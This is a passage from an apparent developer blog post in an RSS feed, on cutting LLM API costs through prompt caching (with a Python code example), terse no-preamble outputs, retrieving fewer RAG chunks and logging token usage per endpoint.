&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;claude-opus-4-7&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;LARGE_SYSTEM_PROMPT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cache_control&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ephemeral&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;role&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;content&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;user_query&lt;/span&gt;&lt;span class="p"&gt;}]&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Cached tokens cost 10% of uncached tokens. If your system prompt is 2,000 tokens and you call it 10,000 times a day, you just cut &lt;strong&gt;90% of that budget line&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The deeper win: stop sending context the model doesn't need. If your RAG retrieval returns 8 chunks but only 2 are relevant, you're paying to process 6 chunks of noise. Rerank harder. Retrieve less.&lt;/p&gt;

&lt;h2&gt;
  
  
  "But doesn't terse output hurt UX?"
&lt;/h2&gt;

&lt;p&gt;This is the pushback I hear most. The data says the opposite.&lt;/p&gt;

&lt;p&gt;Users rate concise answers higher than padded ones in every eval I've seen. Nobody reads "I'd be delighted to assist you with that query." They skim past it looking for the answer. The filler is friction, not warmth.&lt;/p&gt;

&lt;p&gt;If your product genuinely needs conversational tone — customer support bots, companions — keep the warmth but strip the &lt;em&gt;redundancy&lt;/em&gt;. "Thanks for reaching out!" once is fine. Five times across one response is expensive cosplay.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;Token usage isn't an optimization problem. It's a design problem.&lt;/p&gt;

&lt;p&gt;Most teams treat LLM cost like server cost — something you fix by scaling. But LLM cost is determined at prompt-design time. A badly-designed prompt costs 3x more for worse answers. A well-designed prompt costs less and answers better.&lt;/p&gt;

&lt;p&gt;The teams who figure this out in 2026 will ship AI features at one-third the cost of everyone else. That's not a small moat. That's the whole game.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Add the "no preamble" instruction to your system prompt — 30 seconds, saves ~40% immediately.&lt;/li&gt;
&lt;li&gt;Turn on prompt caching for any system prompt over 1,000 tokens.&lt;/li&gt;
&lt;li&gt;Log token usage per endpoint. You can't fix what you don't measure.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you're running LLMs in production and you haven't done these three things, you're leaving real money on the table.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for more decoded AI infrastructure. Next up: the RAG retrieval bug costing you 40% of your relevance score.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>productivity</category>
      <category>tutorial</category>
    </item>
  </channel>
</rss>
